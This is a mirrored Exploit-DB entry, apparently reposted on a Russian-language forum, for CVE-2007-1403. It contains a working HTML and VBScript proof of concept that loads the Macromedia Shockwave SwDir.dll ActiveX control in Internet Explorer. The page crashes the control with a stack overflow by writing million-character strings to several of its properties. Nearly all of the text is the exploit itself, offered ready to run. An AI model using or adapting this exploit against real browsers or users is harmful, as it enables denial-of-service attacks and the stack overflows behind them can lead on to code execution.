- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 3421
- Проверка EDB
-
- Пройдено
- Автор
- SHINNAI
- Тип уязвимости
- DOS
- Платформа
- WINDOWS
- CVE
- cve-2007-1403
- Дата публикации
- 2007-03-07
HTML:
<pre>
<code><span style="font: 10pt Courier New;"><span class="general1-symbol">-----------------------------------------------------------------------------
Macromedia SwDir.dll ver. 10.1.4.20 multiple methods Stack Overflow
author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://shinnai.altervista.org
Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
-----------------------------------------------------------------------------
<object classid='clsid:233C1507-6A77-46A4-9443-F871F945D258' id='Shockwave' style="WIDTH: 0px; HEIGHT: 0px" ></object>
<select style="width: 404px" name="Pucca">
<option value = "BGCOLOR">BGCOLOR</option>
<option value = "SRC">SRC</option>
<option value = "AutoStart">AutoStart</option>
<option value = "Sound">Sound</option>
<option value = "DrawLogo">DrawLogo</option>
<option value = "DrawProgress">DrawProgress</option>
<option value = "Quoting">Quoting...</option>
</select>
<input language=VBScript onclick=tryMe() type=button value="Click here to start the test">
<script language='vbscript'>
Sub tryMe
on error resume next
if Pucca.value="BGCOLOR" then
argCount = 1
arg1=String(1000000, "A")
Shockwave.BGCOLOR = arg1
elseif Pucca.value="SRC" then
argCount = 1
arg1=String(1000000, "A")
Shockwave.SRC = arg1
elseif Pucca.value = "AutoStart" then
argCount = 1
arg1=String(1000000, "A")
Shockwave.AutoStart = arg1
elseif Pucca.value = "Sound" then
argCount = 1
arg1=String(1000000, "A")
Shockwave.Sound = arg1
elseif Pucca.value = "DrawLogo" then
argCount = 1
arg1=String(1000000, "A")
Shockwave.DrawLogo = arg1
elseif Pucca.value = "DrawProgress" then
argCount = 1
arg1=String(1000000, "A")
Shockwave.DrawProgress = arg1
else
MsgBox "Hence to fight and conquer in all your battles is not supreme excellence;" & vbCrLf & _
"supreme excellence consists in breaking the enemy's resistance without fighting."
end if
End Sub
</script>
</span></span>
</code></pre>
# milw0rm.com [2007-03-07]- Источник
- www.exploit-db.com
